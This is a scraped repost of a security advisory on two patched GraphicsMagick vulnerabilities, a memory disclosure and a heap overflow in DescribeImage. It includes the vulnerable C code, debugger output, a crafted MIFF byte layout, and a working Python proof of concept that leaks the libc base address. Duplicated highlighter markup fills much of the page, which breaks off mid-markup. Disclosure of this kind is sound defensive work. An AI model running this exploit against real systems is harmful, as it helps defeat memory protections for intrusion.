{"id":10203,"date":"2017-10-31T14:21:40","date_gmt":"2017-10-31T22:21:40","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/31\/news-3976\/"},"modified":"2017-10-31T14:21:40","modified_gmt":"2017-10-31T22:21:40","slug":"news-3976","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/31\/news-3976\/","title":{"rendered":"SSD Advisory \u2013 GraphicsMagick Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Tue, 31 Oct 2017 17:25:29 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in GraphicsMagick.<\/p>\n<p>GraphicsMagick is &#8220;The swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler&#8217;s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.&#8221;<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>Memory Information Disclosure<\/li>\n<li>Heap Overflow<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> Independent security researchers Jeremy Heng (@nn_amon) and Terry Chia (Ayrx) have reported these vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).<\/p>\n<p>For more details: ftp:\/\/ftp.graphicsmagick.org\/pub\/GraphicsMagick\/snapshots\/ChangeLog.txt<\/p>\n<p><strong><u>Vulnerabilities details<\/u><\/strong><\/p>\n<p><strong>Memory Information Disclosure<\/strong><br \/> GraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the <code><em>DescribeImage<\/em><\/code> function of the <code><em>magick\/describe.c<\/em><\/code> file.<\/p>\n<p>The vulnerable portion of the code is responsible for printing the IPTC profile information contained in the image.
<\/p>\n<p>This vulnerability can be triggered with a specially crafted MIFF file.<\/p>\n<p>The code which triggers the vulnerable code path is:<\/p>\n<pre><code>  63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\n  64                                           const MagickBool verbose)\n  65 {\n ...\n 660       for (i=0; i &lt; profile_length; )\n 661         {\n 662           if (profile[i] != 0x1c)\n 663             {\n 664               i++;\n 665               continue;\n 666             }\n 667           i++;  \/* skip file separator *\/\n 668           i++;  \/* skip record number *\/\n ...\n 725           i++;\n 726           (void) fprintf(file,\"    %.1024s:\\n\",tag);\n 727           length=profile[i++] &lt;&lt; 8;\n 728           length|=profile[i++];\n 729           text=MagickAllocateMemory(char *,length+1);\n 730           if (text != (char *) NULL)\n 731             {\n 732               char\n 733                 **textlist;\n 734\n 735               register unsigned long\n 736                 j;\n 737\n 738               (void) strncpy(text,(char *) profile+i,length);\n 739               text[length]='\\0';\n 740               textlist=StringToList(text);\n 741               if (textlist != (char **) NULL)\n 742                 {\n 743                   for (j=0; textlist[j] != (char *) NULL; j++)\n 744                     {\n 745                       (void) fprintf(file,\"  %s\\n\",textlist[j]);\n ...\n 752           i+=length;\n 753         }<\/code><\/pre>\n<p>The value of the <code>profile_length<\/code> variable is set by the following field in the MIFF header: <em>profile-iptc=8<\/em><\/p>\n<p>There is an out-of-bounds buffer dereference whenever <code>profile[i]<\/code> is accessed, because the increments of <code>i<\/code> inside the loop body are never bounds-checked.
<\/p>\n<p>If we break on line 738 of <code>describe.c<\/code>, we can explore what is present on the heap during the <code>strncpy<\/code> operation.<\/p>\n<pre><code>gef\u27a4  x\/2xg profile\n0x8be210:    0x08000a001c414141    0x00007ffff690fba8<\/code><\/pre>\n<p>The 8 bytes <code>0x08000a001c414141<\/code> are the profile payload present in the specially crafted MIFF file:<\/p>\n<pre><code>41 41 41 - padding\n1C       - sentinel check in line 662\n00       - padding\n0A       - \"Priority\" tag\n08 00    - 8 in big endian, the length<\/code><\/pre>\n<p>If we examine the value <code>0x00007ffff690fba8<\/code> adjacent to the payload, it becomes apparent that it is an address within the <code>main_arena<\/code> struct in libc.<\/p>\n<pre><code>gef\u27a4  x\/xw 0x00007ffff690fba8\n0x7ffff690fba8 &lt;main_arena+136&gt;:    0x008cdc40\ngef\u27a4  vmmap libc\nStart              End                Offset             Perm Path\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x  \/lib\/x86_64-linux-gnu\/libc-2.23.so\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---  \/lib\/x86_64-linux-gnu\/libc-2.23.so\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--  \/lib\/x86_64-linux-gnu\/libc-2.23.so\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-  \/lib\/x86_64-linux-gnu\/libc-2.23.so<\/code><\/pre>\n<p>Now we can calculate the offset to libc base: <code>0x3c4b98<\/code><\/p>\n<p><u>Proof of Concept<\/u><\/p>\n<pre><code>$ python miff\/readexploit.py\n[+] Starting local process '\/usr\/bin\/gm': pid 20019\n[+] Receiving all data: Done (1.27KB)\n[*] Process '\/usr\/bin\/gm' stopped with exit code 0 (pid 20019)\n[*] Main Arena Leak: 0x7f72948adb98\n[*] libc Base: 0x7f72944e9000<\/code><\/pre>\n<div id=\"crayon-59f8f774244b8242621114\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<pre><code>#!\/usr\/bin\/python\n# GraphicsMagick IPTC Profile libc Leak\n\nfrom pwn import *\n\ndirectory = \"DIR\"\npartitions = ('id=ImageMagick  version=1.0\\nclass=DirectClass  matte=False\\n' +\n              'columns=1  rows=1  depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\n              'e-iptc=',\n              '\\n\\x0c\\n:\\x1a',\n              '\\n\\x00',\n              '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\noutput = \"readexploit.miff\"\nlength = 8\n\n#libc_main_arena_entry_offset = 0x3c4ba8\nlibc_main_arena_entry_offset = 0x3c4b98\n\ndef main():\n    data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\n    header = partitions[0] + str(length) + partitions[1]\n    payload = header + directory + partitions[2] + data + partitions[3]\n    file(output, \"w\").write(payload)\n\n    p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\n    output_leak = p.recvall()\n    priority_offset = output_leak.index(\"Priority:\") + 12\n    montage_offset = output_leak.index(\"Montage:\") - 3\n    leak = output_leak[priority_offset:montage_offset]\n    if \"0x00000000\" in leak:\n        log.info(\"Unlucky run. Value corrupted by StringToList\")\n        exit()\n    main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\n    log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\n    libc_base = main_arena_leak - libc_main_arena_entry_offset\n    log.info(\"libc Base: 0x%x\" % libc_base)\n\nif __name__ == \"__main__\":\n    main()<\/code><\/pre>\n<p>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div
class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;nx00xbexbexbexbexbexben&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-13\"><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;readexploit.miff&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-14\"><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-16\"><span class=\"crayon-c\">#libc_main_arena_entry_offset = 0x3c4ba8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-17\"><span class=\"crayon-v\">libc_main_arena_entry_offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x3c4b98<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-19\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;AAA&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x1c&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">chr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">p16<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">endian<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;big&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span 
class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">directory<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">file<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-25\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">process<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">executable<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;gm&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;identify&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;-verbose&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">output_leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">recvall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priority_offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output_leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">index<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Priority:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">montage_offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output_leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">index<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Montage:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output_leak<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">priority_offset<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">montage_offset<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0x00000000&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Unlucky run. Value corrupted by StringToList&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">main_arena_leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u64<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ljust<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Main Arena Leak: 0x%x&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">main_arena_leak<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">libc_base<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">main_arena_leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">libc_main_arena_entry_offset<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-36\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;libc Base: 0x%x&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libc_base<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-38\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;__main__&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0056 seconds] -->  <\/p>\n<p><strong>Heap Overflow<\/strong><br \/> GraphicsMagick is vulnerable to a heap overflow vulnerability found in <code><em>DescribeImage()<\/em><\/code> function of the magick\/describe.c file.<\/p>\n<p>The call to <code><em>strncpy<\/em><\/code> on line 855 does not limit the size to be copied to the size of the buffer copied to. 
Instead, the copy length is computed by scanning the directory name for a newline or a null byte.<\/p>\n<\/p>\n<div id=\"crayon-59f8f774244bc287208740\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">844       \/*\n845         Display visual image directory.\n846       *\/\n847       image_info=CloneImageInfo((ImageInfo *) NULL);\n848       (void) CloneString(&amp;image_info-&gt;size,\"64x64\");\n849       (void) fprintf(file,\"  Directory:\\n\");\n850       for (p=image-&gt;directory; *p != '\\0'; p++)\n851         {\n852           q=p;\n853           while ((*q != '\\n') &amp;&amp; (*q != '\\0'))\n854             q++;\n855           (void) strncpy(image_info-&gt;filename,p,q-p);\n856           image_info-&gt;filename[q-p]='\\0';\n857           p=q;\n...\n880         }\n881       DestroyImageInfo(image_info);<\/textarea><\/div>\n<\/p><\/div>\n<p>Since the <code>filename<\/code> field of the <code>ImageInfo<\/code> struct has a fixed size of 2053, a forged directory name longer than that corrupts the heap.<\/p>\n<\/p>\n<div id=\"crayon-59f8f774244bf963080980\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">type = struct _ImageInfo {\n...\n    FILE *file;\n    char magick[2053];\n    char filename[2053];\n    _CacheInfoPtr_ cache;\n    void *definitions;\n    Image *attributes;\n    unsigned int ping;\n    PreviewType preview_type;\n    unsigned int affirm;\n    _BlobInfoPtr_ blob;\n    size_t length;\n    char unique[2053];\n    char zero[2053];\n    unsigned long signature;\n}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" 
data-line=\"crayon-59f8f774244bf963080980-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-1\"><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-e\">_ImageInfo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-2\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">FILE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">magick<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_CacheInfoPtr_ <\/span><span class=\"crayon-v\">cache<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 